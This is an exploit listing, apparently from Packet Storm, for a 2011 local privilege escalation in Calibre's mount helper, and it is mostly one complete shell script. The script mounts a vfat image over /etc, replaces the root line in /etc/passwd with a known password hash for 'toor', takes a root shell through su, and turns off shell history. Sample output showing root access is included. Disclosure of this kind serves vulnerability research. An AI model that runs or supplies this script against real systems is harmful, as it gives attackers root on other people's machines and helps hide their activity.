Calibre E-Book Reader Local Root

2011-11-03T00:00:00
ID PACKETSTORM:106566
Type packetstorm
Reporter zx2c4
Modified 2011-11-03T00:00:00

Description

                                        
                                            `#!/bin/sh  
  
#######################################  
# .60-Calibrer Assault Mount #  
# by zx2c4 #  
#######################################  
  
################################################################################  
# Yesterday we learned how Calibre's usage of execlp allowed us to override PATH  
# and get root, in my ".50-Calibrer Assault Mount" exploit. Today we exploit a  
# more fundumental issue with Calibre's mount helper -- namely, that it allows  
# us to mount a vfat filesystem anywhere we want. By mounting a file system  
# image over /etc, we are able to tinker /etc/passwd and make the root password  
# temporarily "toor".  
#  
# - zx2c4  
# 2011-11-2  
#  
# Usage:  
# $ ./60calibrerassaultmount.sh  
# [+] Making temporary directory: /tmp/tmp.OGgS0jaoD4  
# [+] Making overlay image:  
# 51200+0 records in  
# 51200+0 records out  
# 26214400 bytes (26 MB) copied, 0.100984 s, 260 MB/s  
# mkfs.vfat 3.0.11 (24 Dec 2010)  
# [+] Mounting overlay image using calibre-mount-helper.  
# [+] Copying /etc into overlay.  
# [+] Tampering with overlay's passwd.  
# [+] Unmounting overlay image using calibre-mount-helper.  
# [+] Mounting overlay to /etc using calibre-mount-helper.  
# [+] Asking for root. When prompted for a password, enter 'toor'.  
# Password: [typed in toor to the terminal]  
# [+] Unmounting /etc using root umount.  
# [+] Cleaning up: /tmp/tmp.OGgS0jaoD4  
# [+] Getting shell.  
# sh-4.2# id  
# uid=0(root) gid=0(root) groups=0(root)  
# sh-4.2# whoami  
# root  
# sh-4.2#  
################################################################################  
  
  
echo "#######################################"  
echo "# .60-Calibrer Assault Mount #"  
echo "# by zx2c4 #"  
echo "#######################################"  
echo  
echo -n "[+] Making temporary directory: "  
dir="$(mktemp -d)"  
echo "$dir"  
cd "$dir"  
echo "[+] Making overlay image:"  
dd if=/dev/zero of=overlay count=51200  
/usr/sbin/mkfs.vfat overlay  
echo "[+] Mounting overlay image using calibre-mount-helper."  
mkdir staging  
calibre-mount-helper mount overlay staging  
echo "[+] Copying /etc into overlay."  
cd staging/  
cp -a /etc/* . 2>/dev/null  
echo "[+] Tampering with overlay's passwd."  
cat passwd | tail -n +2 > tmp  
echo "root:$(echo -n 'toor' | openssl passwd -1 -stdin):0:0:root:/root:/bin/bash" >> tmp  
mv tmp passwd  
echo "[+] Unmounting overlay image using calibre-mount-helper."  
cd ..  
calibre-mount-helper eject overlay staging >/dev/null 2>&1  
echo "[+] Mounting overlay to /etc using calibre-mount-helper."  
calibre-mount-helper mount overlay /etc >/dev/null 2>&1  
cd /  
echo "[+] Asking for root. When prompted for a password, enter 'toor'."  
su -c "echo \"[+] Unmounting /etc using root umount.\"; umount /etc; echo \"[+] Cleaning up: $dir\"; rm -rf \"$dir\"; echo \"[+] Getting shell.\"; HISTFILE=\"/dev/null\" exec /bin/sh"  
  
`